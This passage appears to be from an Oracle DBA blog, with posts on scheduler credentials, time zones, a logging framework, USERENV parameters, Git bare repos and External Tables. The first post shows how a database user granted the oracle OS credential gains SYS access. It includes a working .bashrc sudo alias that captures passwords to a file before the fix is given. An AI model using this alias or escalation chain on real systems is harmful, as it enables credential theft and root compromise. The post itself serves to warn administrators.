        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    -- Jobs are created as DISABLED by default, so it won't run immediately...
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential'
    );
    
    -- ...so we have a chance to add a credential to use to connect to the database
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    -- now run the job
    dbms_scheduler.enable(v_job_name);
end;
/

After executing this job, we can see that the test was successful :

select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB1'
/       


OUTPUT                                                                                                                            
---------------------------------------------------------------

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 18:55:54 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> Connected.
SQL> SQL> SQL> SQL> SQL>   2    3    4    5  
OS_USER              DB_USER              DB_NAME
-------------------- -------------------- --------------------
oracle               HR                   ORCL

SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0

However, there is something of a security issue with creating a credential on the oracle os user.

Would you like root with that ?

Whilst, in Connor’s example, the user created the credential themselves ( so presumably already knew the oracle OS user’s password), that’s not the case here.

That means that we’ve effectively just given HR passwordless access to the database as SYS.

To demonstrate :

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB2';
    v_script varchar2(32767);
begin
    -- No sys password ? No problem !
    v_script := q'[
        conn / as sysdba
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential'
    );
    
    -- now run the job
    dbms_scheduler.enable(v_job_name);
end;
/

This time, we’ve hard-coded a connect string rather than using the database user credential. The result is a bit worrying…

OUTPUT                                                                                                                            
------------------------------------------------------------------------------

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 19:15:43 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> SQL> Connected.
SQL> SQL> SQL> SQL>   2    3    4    5  
OS_USER              DB_USER              DB_NAME
-------------------- -------------------- --------------------
oracle               SYS                  orclcdb

SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0

Because the OS connection is as oracle, we can use the “/ as sysdba” connect string to connect as SYS.
It’s also worth bearing in mind that the credential can be used for jobs other than SQL_SCRIPT…

declare
    v_job_name varchar2(30) := 'HR_EXTERNAL';
    v_script varchar2(32767);
    
begin
    v_script := 'whoami';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'EXTERNAL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/

select output
from user_scheduler_job_run_details
where job_name = 'HR_EXTERNAL'
/

OUTPUT                        
------------------------------
oracle

On this Oracle Linux server, oracle is on the sudoers list, which means HR can do something like this…

set define off
declare
    v_job_name varchar2(30) := 'MWAHAHAHA';
    v_script varchar2(32767);
    
begin
    v_script := q'[/usr/bin/echo "alias sudo='echo -n \"[sudo] password for \$USER: \" && read -s -r password && echo -e \"\\n\" && echo \"\$USER:\$password\" >>/u01/userhome/oracle/stohelit.txt; echo \$password | $(which sudo) -S \$@'" >> /u01/userhome/oracle/.bashrc]';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'EXTERNAL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/

…which adds an alias for sudo to the oracle user’s .bashrc…

cat .bashrc
alias sudo='echo -n "[sudo] password for $USER: " && read -s -r password && echo -e "\n" && echo "$USER:$password" >>/u01/userhome/oracle/stohelit.txt; echo $password | /usr/bin/sudo -S $@'

This executes the next time anyone runs a sudo command whilst connected as oracle…

[oracle@localhost oracle]$ sudo ls -l
[sudo] password for oracle: 

Meaning that the oracle OS password is saved into a file called stohelit.txt and can be retrieved by running something like :

declare
    v_job_name varchar2(30) := 'UNLIMITED_POWER';
    v_script varchar2(32767);
    
begin
    v_script := 'ho /usr/bin/cat /u01/userhome/oracle/stohelit.txt';
        
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential',
        enabled => TRUE
    );
end;
/
select output
from user_scheduler_job_run_details
where job_name = 'UNLIMITED_POWER'
/

With the password, it’s now possible to run commands as root ( using sudo).

Clearly, a rethink is required…

revoke execute on oracle_os_credential from hr;
Creating an OS user for SQL_SCRIPT jobs

What we need is an OS user that isn’t oracle. But what else does an account need in order to run SQL_SCRIPT jobs ?
It turns out that the minimum requirement is simply a password.
If the application already has an OS user associated with it, then you can use that.
If not then we need to create one.

Remember, in my case, I’m on Oracle Linux so it’s just a matter of…

sudo useradd -m hr_etl
sudo passwd hr_etl

…and that’s it.

The new account doesn’t even need to have the SQL*Plus executable in its $PATH

[hr_etl@localhost ~]$ sqlplus /nolog
bash: sqlplus: command not found...

To demonstrate, we’ll connect to the database as the user with the CREATE CREDENTIAL privilege and …

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_ETL_OS_CREDENTIAL',
        username => 'hr_etl',
        password => 'Y3tanothercompl!catedpassword'
    );
end;
/

grant execute on hr_etl_os_credential to hr;

Now connected to the database as HR we use the new credential.

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB3';
    v_script varchar2(32767);

begin
    -- SQL*Plus statements included, but no connect string
    v_script := q'[
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';
        
    -- Using the new credential...
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.hr_etl_os_credential'
    );
    
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

Better still, if we now try to login as SYS using the “/ as sysdba” syntax…

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB4';
    v_script varchar2(32767);
begin
    v_script := q'[
        conn / as sysdba
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.hr_etl_os_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

…Oracle is having none of it…

select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB4'
/

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 20:09:43 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> SQL> ERROR:
ORA-01017: invalid username/password; logon denied


SQL> SQL> SQL> SQL>   2    3    4    5  SP2-0640: Not connected
SQL> 

In an application such as this, you’ll probably want to use SQL_SCRIPT to read and write files on the operating system, in which case further configuration will be needed in terms of OS file permissions etc. As far as running the jobs is concerned though, you should be good to go.

Acknowledgements

The sudo credential exploit above is based on a rather more elegant example in the SUDO_KILLER GitHub Repo.

Oracle DBMS_SCHEDULER – Getting in a tangle with Time Zones

Mon, 2024-10-28 02:30

DBMS_SCHEDULER’s slightly arcane but extremely flexible calendaring syntax allows myriad ways to determine when a batch job should run.
However, there is a limitation when it comes to specifying which time zone should be used by the scheduler.
The documentation says :

The calendaring syntax does not allow you to specify a time zone. Instead the Scheduler retrieves the time zone from the start_date argument. If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date. For example specifying the start_date time zone as ‘US/Eastern’ in New York ensures that daylight saving adjustments are automatically applied. If instead, the time zone of the start_date is set to an absolute offset, such as ‘-5:00’, then daylight savings adjustments are not followed and your job execution is off by an hour for half the year.

It goes on to explain that, when the start_date is null, the time zone is determined by ( in descending order of precedence) :

  • the time zone set in the current session (if it’s a Region Name)
  • the DEFAULT_TIMEZONE scheduler attribute
  • the time zone of the SYSTIMESTAMP when the Job (or Window) is enabled
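
You can check the first two of these for yourself with a couple of queries ( the second assumes you have SELECT access on DBA_SCHEDULER_GLOBAL_ATTRIBUTE ) :

select sessiontimezone from dual;

select value
from dba_scheduler_global_attribute
where attribute_name = 'DEFAULT_TIMEZONE';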

Unfortunately, when setting a start_date for a job from inside another scheduler job, things do not work as expected.
If we were on a new-fangled AI enabled version of Oracle, I’d suspect that DIANA has taken a dislike to me ( maybe it doesn’t like the way I format my code, or something).
However, as I’ve experienced this behaviour on the less judgemental 19c ( and earlier), further digging is probably required…

How it Should Work

Let’s begin by confirming that everything works as it should when we setup a job interactively.

To start with, we’ll create a simple scheduler job :

begin
    dbms_scheduler.create_job
    (
        job_name => 'SIMPLE_JOB',
        job_type => 'PLSQL_BLOCK',
        job_action => 'begin null; end;'
    );    
end;
/

We can see at this point that the job has no start_date :

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE     START_DATE 
----- --------- -----------
FALSE DISABLED                                                                                    

Let’s check what the current session time zone is set to :

select sessiontimezone from dual;

SESSIONTIMEZONE               
------------------------------
Europe/London

So, if we now set the job start_date…

exec dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-10-22 08:00', 'YYYY-MM-DD HH24:MI'));
exec dbms_scheduler.enable('simple_job');

… the scheduler should use the Session Time Zone :

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/
ENABL STATE      START_DATE                                 
----- ---------- ------------------------------------------
TRUE  SCHEDULED  22-OCT-24 08.00.00.000000000 EUROPE/LONDON 

No issues there, let’s see what happens when we…

Set the Start Date from another Scheduler Job

Let’s start with a clean slate and drop and re-create the job :

exec dbms_scheduler.drop_job('simple_job');

begin
dbms_scheduler.create_job
(
    job_name => 'SIMPLE_JOB',
    job_type => 'PLSQL_BLOCK',
    job_action => 'begin null; end;'
);    
end;
/

This time, we’re going set the start_date for SIMPLE_JOB from another scheduler job :

declare
    v_action varchar2(4000) := 
    q'[
        begin
            dbms_scheduler.set_attribute('simple_job', 'start_date', to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI'));
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

Now when we run ENABLE_JOB…

exec dbms_scheduler.run_job('enable_job');

…we can see that the scheduler has ignored the time zone altogether and instead applied an offset to UTC :

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE                START_DATE                          
----- -------------------- ----------------------------------- 
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 +01:00 

Furthermore, the offset specified in the START_DATE value does not match the offset for the Europe/London region for that date:

select extract( timezone_hour from timestamp '2024-11-22 08:00:00.00 Europe/London') 
as offset_to_utc
from dual;

OFFSET_TO_UTC
-------------
0

Consequently, the job will fire at 07:00 rather than 08:00 Europe/London time on that date.
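
We can confirm where the hour has gone by converting both the stored start time and the intended one to UTC :

select 
    sys_extract_utc( timestamp '2024-11-22 08:00:00 +01:00') as stored_start_utc,
    sys_extract_utc( to_timestamp_tz('2024-11-22 08:00 Europe/London', 'YYYY-MM-DD HH24:MI TZR')) as intended_start_utc
from dual;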

The Fix

If you were paying attention, you’ll know that the fix is RTFM !

Yes, that quote from the documentation above is explicit :

If jobs must follow daylight savings adjustments, then you must specify a region name for the time zone of the start_date.

In other words…

exec dbms_scheduler.drop_job('enable_job');

declare
    v_action varchar2(4000) := 
    q'[
        begin
            dbms_scheduler.set_attribute
            (
                name => 'simple_job', 
                attribute => 'start_date', 
                value => to_timestamp_tz('2024-11-22 08:00 Europe/London', 'YYYY-MM-DD HH24:MI TZR')
            );
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

Now, when we run the job that sets the start_date…

exec dbms_scheduler.run_job('enable_job');

…the Region we’ve specified is used …

select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE                START_DATE                                 
----- -------------------- ------------------------------------------ 
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 EUROPE/LONDON 
Why does this happen ?

For the moment, I’m going to assume that this is not caused by my reluctance to use commas at the start of the line in a select clause.

I’ve knocked up a procedure which will record the values of the relevant objects and save them to a log table. For this purpose, I’m using the Skippy framework, which will write to the SKIPPY_LOGS table.

NOTE – you will need to have SELECT on DBA_SCHEDULER_GLOBAL_ATTRIBUTE granted directly to the procedure owner for this to compile :

create or replace procedure log_tz_settings
as
    cursor c_tz_settings is
        select 
            sessiontimezone as session_tz,
            value as default_timezone,
            to_char(to_timestamp_tz( systimestamp), 'TZR') as systimestamp_tz
        from dba_scheduler_global_attribute
        where attribute_name = 'DEFAULT_TIMEZONE';
        
    v_settings c_tz_settings%rowtype;
    v_set_list varchar2(4000);
begin
    open c_tz_settings;
    fetch c_tz_settings into v_settings;
    close c_tz_settings;
    
    skippy.add_param('SESSION_TZ', v_settings.session_tz, v_set_list);
    skippy.add_param('DEFAULT_TIMEZONE', v_settings.default_timezone, v_set_list);
    skippy.add_param('SYSTIMESTAMP_TZ', v_settings.systimestamp_tz, v_set_list);
    
    skippy.log(v_set_list);
end;
/

When we execute this procedure in an interactive session, we can see that the values are as expected :

clear screen
set serverout on
exec skippy.enable_output;
exec log_tz_settings;

PL/SQL procedure successfully completed.

SESSION_TZ => Europe/London, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00

However, if we now add a call to this procedure in the ENABLE_JOB :

exec dbms_scheduler.drop_job('enable_job');

declare
    v_action varchar2(4000) := 
    q'[
        begin
            skippy.set_msg_group('CHECK_TZ_SETTINGS');
            log_tz_settings;
            dbms_scheduler.set_attribute
            (
                name => 'simple_job', 
                attribute => 'start_date', 
                value => to_date('2024-11-22 08:00', 'YYYY-MM-DD HH24:MI')
            );
            dbms_scheduler.enable('simple_job');   
        end;]';    
begin
    dbms_scheduler.create_job
    (
        job_name => 'enable_job',
        job_type => 'plsql_block',
        job_action => v_action
    );
end;
/

…and run it again…

exec dbms_scheduler.run_job('enable_job');
select enabled, state, start_date
from user_scheduler_jobs
where job_name = 'SIMPLE_JOB'
/

ENABL STATE                START_DATE                          
----- -------------------- -----------------------------------
TRUE  SCHEDULED            22-NOV-24 08.00.00.000000000 +01:00

When we check the log, we can see that the SESSIONTIMEZONE value is not what we expected :

select message
from skippy_logs
where message_group = 'CHECK_TZ_SETTINGS'
/

MESSAGE                                                                                                                           
---------------------------------------------------------------
SESSION_TZ => +01:00, DEFAULT_TIMEZONE => PST8PDT, SYSTIMESTAMP_TZ => +01:00

Incidentally, the Scheduler Default Timezone (PST8PDT) currently has an offset of -7 hours to UTC.

Therefore, we can infer that, in the session the Scheduler Job runs in, SESSIONTIMEZONE is an absolute offset rather than a region name – and it is this value that the scheduler is using.

Assorted Time Zone Information

Oracle provides a list of valid Region Names in the form of V$TIMEZONE_NAMES. For example …

select tzname, tzabbrev
from v$timezone_names
where tzname = 'UTC'
/

TZNAME                                             TZABBREV  
-------------------------------------------------- ----------
UTC                                                GMT       

If we look at the currently defined Region in my session, we can see multiple TZABBREV values that appear to represent daylight savings changes …

select tzname, tzabbrev
from v$timezone_names
where tzname = sessiontimezone
/

TZNAME                                             TZABBREV  
-------------------------------------------------- ----------
Europe/London                                      LMT       
Europe/London                                      GMT       
Europe/London                                      BST       
Europe/London                                      BDST      

Using the built-in TZ_OFFSET function, we can establish the current UTC offset for a Region…

select tz_offset('Europe/London')  from dual;

TZ_OFFS
-------
+01:00

To see which particular abbreviation this offset relates to :

select to_char(current_timestamp, 'TZD') from dual;

TO_CHA
------
BST

If we want to know which particular Timezone abbreviation will apply for any given month in the year, and when they will change, we may need to write something a bit fiddly like :

select 
    to_char( to_date( rownum, 'MM'), 'Month') as "Month",
    -- Using 10:08 as the time because that's what you see in all the watch/clock adverts. Phones too.
    -- This time was apparently chosen because, on an Analog clockface the hands are forming a "smile".
    to_char
    ( 
        to_timestamp_tz 
        (
            extract( year from sysdate)||'-'||
            to_char( lpad( rownum, 2, '0'))||'-'||
            '01 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
        ),
        'TZD'
    ) as "Start of Month TZ Abbreviation",
    to_char
    ( 
        to_timestamp_tz 
        (
            extract( year from sysdate)||'-'||
            to_char( lpad( rownum, 2, '0'))||'-'||
            to_char( last_day( to_date( rownum, 'MM')), 'DD')||
            ' 10:08:00 Europe/London', 'YYYY-MM-DD HH24:MI:SS TZR'
        ),
        'TZD'
    ) as "End of Month TZ Abbreviation"
from dual
connect by rownum <= 12;

What’s that ? You think DIANA may have a point about my code formatting ? Honestly, everyone’s a critic ! Anyhow, the output looks like this :

Other Useful Link

I bet Tim Hall never has this trouble. Also, his Oracle Base article on setting Time Zones is typically thorough.

Skippy – Displaying log messages using DBMS_OUTPUT

Mon, 2024-10-21 01:30

I’ve added a feature to the Skippy framework which makes it possible to see log messages in an interactive session, as well as in the log table.
You can find Skippy on GitHub.

Now, Skippy isn’t really into cricket – Rugby League is more of a Kangaroo sport – but I am, which may go some way to explaining the examples that follow.

England’s continuing Bazball adventure has met with contrasting fortunes over the last week or so.
In this first example, we can see the sort of logging that you might find in long-running scheduler batch jobs :

begin
    skippy.set_msg_group('FIRST_TEST');
    skippy.log('Day 1 : Pakistan 328/4');
    skippy.log('Day 2 : Pakistan 556 all out, England 96/1');
    skippy.log('Day 3 : England 492/3');
    skippy.log('Day 4 : England 823/7 dec, Pakistan 152/6');
    skippy.log('Day 5 : Pakistan 220 all out');
    skippy.log('Result : England win by an innings and 47 runs');
end;
/

After running this, we have to hunt around in the SKIPPY_LOGS table to find the log messages :

select log_ts, message
from skippy_logs
where message_group = 'FIRST_TEST'
order by log_ts;

If we want to execute code in an interactive session, we can now read the log messages in the session itself.
To do this :

  • enable SERVEROUTPUT in your interactive session so you can see the messages
  • call the new SKIPPY.ENABLE_OUTPUT procedure.
  • call SKIPPY.DISABLE_OUTPUT to toggle this feature off.

For example…

set serverout on
begin
    skippy.set_msg_group('SECOND_TEST');
    skippy.enable_output;
    skippy.log('Day 1 : Pakistan 259/5');
    skippy.log('Day 2 : Pakistan 366, England 239/6');
    skippy.log('Day 3 : England 291, Pakistan 221, England 36/2');
    skippy.log('Day 4 : ERROR - England batting failed 144 all out');
    skippy.log('Result : Pakistan win by 152 runs');
    -- optionally turn output off
    skippy.disable_output;
end;
/

As well as outputting to the screen, SKIPPY still writes the log messages to the table.
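
…which we can confirm with the same sort of query as before :

select log_ts, message
from skippy_logs
where message_group = 'SECOND_TEST'
order by log_ts;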

What’s that Skippy ? SYS_CONTEXT USERENV Parameters in the database don’t match the docs ?

Mon, 2024-07-15 01:30

The USERENV namespace lurks in one of the darker corners of your Oracle Database.
In conjunction with the SYS_CONTEXT function, it’s incredibly useful if you want to know what’s happening in your session environment at any given time.
However, the parameters defined for this namespace are locked away beyond the reach of mere mortals, which means you have to rely on the documentation to know which parameters are valid on which version of Oracle.
You might think that’s not really a problem, after all, Oracle Documentation is pretty reliable, right ?
Yes…mostly…

Having grown lazy over the years and decided that I wanted to do as little typing as possible when logging from my PL/SQL code, I wrote a simple framework called Skippy, which is on GitHub, if you’re interested.

One element of Skippy is a simple table which holds a list of all the available parameters for the USERENV namespace and the version from which they are valid. There is also a view – SKIPPY_ENV, which overlays the table and returns values for the parameters which are valid for the Oracle version it’s currently running.

Originally, the parameters listed in the table were gleaned from the Oracle documentation – most recently, the 19c and 23ai versions.

Unfortunately, there are a couple of discrepancies between the documentation and the database.

According to the 19c documentation, CDB_DOMAIN is a valid parameter on 19c, whilst CLOUD_SERVICE is not mentioned.
Meanwhile, IS_APPLICATION_ROOT and IS_APPLICATION_PDB are absent from the 23ai docs, despite them having been around since 19c.

The reality on 19c is that CDB_DOMAIN is not valid, but CLOUD_SERVICE is (tested on an OCI Free Tier instance) :

select product, version_full
from product_component_version;

PRODUCT                                            VERSION_FULL        
-------------------------------------------------- --------------------
Oracle Database 19c Enterprise Edition             19.24.0.1.0         
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual; 

…results in…

ORA-02003: invalid USERENV parameter

By contrast…

select sys_context('userenv', 'cloud_service') as cloud_service from dual;

CLOUD_SERVICE       
--------------------
OLTP
select sys_context('userenv', 'is_application_root') as is_application_root from dual;

IS_APPLICATION_ROOT 
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;

IS_APPLICATION_PDB  
--------------------
NO

Meanwhile, it appears that IS_APPLICATION_ROOT and IS_APPLICATION_PDB are still valid on 23ai. This time, I’ve tested on a VirtualBox Dev Day Appliance :

select product, version_full
from product_component_version;

PRODUCT                                            VERSION_FULL        
-------------------------------------------------- --------------------
Oracle Database 23ai Free                          23.4.0.24.05        
select sys_context('userenv', 'is_application_root') as is_application_root from dual;

IS_APPLICATION_ROOT 
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;

IS_APPLICATION_PDB  
--------------------
NO

CDB_DOMAIN has also made an appearance in this version :

select sys_context('userenv', 'cdb_domain') as cdb_domain from dual; 

CDB_DOMAIN          
--------------------

CLOUD_SERVICE is still kicking around :

select sys_context('userenv', 'cloud_service') as cloud_service from dual;

CLOUD_SERVICE       
--------------------

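If you just want to check whether a particular parameter is valid on the version in front of you, a quick sanity check like this ( a sketch of my own, trapping the ORA-02003 error we saw earlier ) saves a trip to the documentation :

set serverout on
declare
    v_param varchar2(30) := 'cdb_domain'; -- the parameter you want to check
    v_value varchar2(4000);
    e_invalid_param exception;
    pragma exception_init( e_invalid_param, -2003);
begin
    select sys_context('userenv', v_param) into v_value from dual;
    dbms_output.put_line(v_param||' is valid. Current value : '||nvl(v_value, 'NULL'));
exception
    when e_invalid_param then
        dbms_output.put_line(v_param||' is not a valid USERENV parameter on this version');
end;
/
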
I’ve submitted comments on the appropriate documentation pages but I can’t see any way to track the response or progress on these.

Fortunately for me, my friendly neighbourhood marsupial has now got this covered, but it’s something you may want to keep an eye out for if you maintain your own list of USERENV parameters.

Creating a central Repository using Git Bare

Mon, 2024-06-17 01:30

When working in a large IT department, there are times when you feel a bit like a Blue Peter presenter.
For example, there may be a requirement to collaborate with other programmers on a project but, for whatever reason, you do not have access to a hosting platform ( Github, Bitbucket, Gitlab – pick your favourite).

What you do have is a network share to which you all have access, and Git installed locally on each of your machines.

This can be thought of as the technical equivalent of an empty washing-up bottle, a couple of loo rolls and some sticky back plastic.
Fortunately, this represents the raw materials required to construct a Tracey Island or – in this case – a Bare Git Repo to act as the main repository for the project…

The Repository we want to share looks like this :

To create the main repository on the share, we can open a command window and create the directory to hold the repository on the share ( which is mapped to Z:\ in my case) :

mkdir z:\blue_peter


…then navigate to the new directory and create a Bare Repo …

git init --bare

You can then populate it from the existing project by adding the new main repo as a remote in the local repository and pushing :

git remote add origin z:\blue_peter
git push origin main

NOTE – it could be because I was doing this on a VM, but when I first ran the push, I got an error about the ownership of the shared directory :

This can be solved by running :

git config --global --add safe.directory z:blue_peter

Looking at our new main repo on the share, we can see that the contents are not stored as the individual project files you’d see in a normal working copy :

However, we can access the contents via Git in the normal way.
For example, I can now clone the repository to a different location. In real-life this would be a completely different client, but I’ve run out of VMs !

git clone z:\blue_peter

Side Note – Once again, I hit the dubious ownership issue :

Anyhow, we can see the files as usual in the cloned repo :

…and the repository now behaves as expected. If we make a change and push it…

…we can pull the change in another “client” :

After all that, I think you’ve earned a Blue Peter Badge.

Oracle External Tables and the External Modify Clause

Wed, 2024-06-05 13:51

I like to think that I’m not completely useless in the kitchen. A pinch of this, a dash of that and a glug of what you fancy ( which may or may not make its way into whatever I’m cooking) and the result is usually edible at least.
That said, the combination of precise quantities of substances by means of closely controlled chemical reactions is more Deb’s forte.
The result is usually delicious. Being traditionalists in our house, we do like to follow the time-honoured bake-off format and have a judging session of the finished article. We think of it as the Great British Cake Scoff.
However satisfying the act of culinary creation may be, there are times when you just want something you need to stick in the microwave for 2 minutes.
Which brings us to the matter of Oracle External Tables.

When they first arrived, External Tables provided an easy way to load data from a file directly into the database without all that messing about with SQL*Loader.
Of course, there were some limitations. If you wanted to point an external table at a file, you’d have to issue an alter table statement to set it ( and possibly the directory as well).
This meant that External Table access had to be serialized to ensure that it was pointed at the correct file until you were finished with it.
If you find yourself switching between Oracle versions, it’s worth remembering that, these days, things are a little different, thanks to the EXTERNAL MODIFY clause, which arrived in 12c.

What I’ll be looking at here is whether External tables can now be used concurrently in different sessions, accessing different files.

I’ll also explore the EXTERNAL MODIFY clause’s aversion to bind variables and how we might work around this securely in PL/SQL.

The Application

The examples that follow were run on an Oracle Developer Day Virtual Box instance running Oracle 19.3.

We have a directory…

create or replace directory recipies_dir as '/u01/app/recipies';

…which contains some text files…

ls -1
debs_lemon_drizzle_cake.txt
mikes_beans_on_toast.txt

…and a simple external table to read files…

create table nom_nom_xt 
(
    line number,
    text varchar2(4000)
)
organization external
(
    type oracle_loader
    default directory upload_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(4000)
        )
    ) 
    location('')
)
reject limit unlimited
/

You’ll notice that I’ve specified a default directory ( UPLOAD_FILES), as this is mandatory, even though we’ll be overriding it at query time. The location (i.e. the target file) is currently null.
Now, in the olden days, we’d have to issue a DDL statement to set the location before we could look at a file.
Since 12c however, we have the EXTERNAL MODIFY clause, so we can do this directly in a query :

select text   
from nom_nom_xt 
    external modify 
    ( 
        default directory recipies_dir 
        location('mikes_beans_on_toast.txt')
    )
/


Alternatively…

select text
from nom_nom_xt 
    external modify
    ( 
        location(recipies_dir:'debs_lemon_drizzle_cake.txt')
    )
/

After running these statements, we can see that the EXTERNAL MODIFY clause has had no effect on the table definition itself :

select directory_name, location
from user_external_locations
where table_name = 'NOM_NOM_XT';

Concurrency

Looking at the EXTERNAL MODIFY clause, it would seem that External Tables should now behave like Global Temporary Tables in that, whilst their structure is permanent, the data they contain is session specific.

Let’s put that to the test.
First of all, I’m going to take advantage of the fact I’m on Linux ( Oracle Linux Server 7.6 since you ask) and generate a text file from /usr/share/dict/words – a file that contains a list of words.

In the recipies directory on the OS :

for i in {1..100}; do cat /usr/share/dict/words >>alphabet_soup.txt; done
cat alphabet_soup.txt >alphabetty_spaghetti.txt

I now have two rather chunky text files :

ls -lh alphabet*
-rw-r--r--. 1 oracle oinstall 473M May 27 14:25 alphabet_soup.txt
-rw-r--r--. 1 oracle oinstall 473M May 27 14:26 alphabetty_spaghetti.txt

…containing just under 48 million lines each…

cat alphabet_soup.txt |wc -l
47982800

Using the single external table, I’m going to load each file into a separate table in separate sessions.

The script for session 1 is :

set worksheetname Soup
column start_time format a10
column end_time format a10

-- Check that this is a different session from "session 2"
select sys_context('userenv', 'sessionid') from dual;

-- Give me time to switch sessions and start the other script
exec dbms_session.sleep(2);

select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;

set timing on
create table alphabet_soup as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabet_soup.txt'));

set timing off

select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;

select count(*) from alphabet_soup;

In session 2 :

set worksheetname Spaghetti
column start_time format a10
column end_time format a10

-- Check that this is a different session from "session 1"
select sys_context('userenv', 'sessionid') from dual;

select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;

set timing on
create table alphabetty_spaghetti as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabetty_spaghetti.txt'));

set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;

select count(*) from alphabetty_spaghetti;

Note – the set worksheetname command is SQLDeveloper specific.

The results are…

Session 1 (Soup)
SYS_CONTEXT('USERENV','SESSIONID')                                                                                                                                                                                                                              
------------------------------------
490941


PL/SQL procedure successfully completed.


START_TIME
----------
14:45:08


Table ALPHABET_SOUP created.

Elapsed: 00:01:06.199

END_TIME
----------
14:46:15


COUNT(*)
----------
47982800

Session 2 (Spaghetti)
SYS_CONTEXT('USERENV','SESSIONID')                                                                                                                                                                                                                              
-----------------------------------
490942


START_TIME
----------
14:45:09


Table ALPHABETTY_SPAGHETTI created.

Elapsed: 00:01:08.043

END_TIME
----------
14:46:17


COUNT(*)
----------
47982800

As we can see, the elapsed time is almost identical in both sessions. More importantly, both sessions’ CTAS statements finished within a couple of seconds of each other.
Therefore, we can conclude that both sessions accessed the External Table concurrently.

Whilst this does represent a considerable advance in the utility of External Tables, there is something of a catch when it comes to using them from PL/SQL…

Persuading EXTERNAL MODIFY to eat its greens

A common use case for External Tables is ETL processing. In such circumstances, the name of the file being loaded is likely to change frequently and so needs to be specified at runtime.
It’s also not unusual to have an External Table that you want to use on more than one directory ( e.g. as a log file viewer).
On the face of it, the EXTERNAL MODIFY clause should present no barrier to use in PL/SQL :

clear screen
set serverout on 
begin
    for r_line in 
    (
        select text
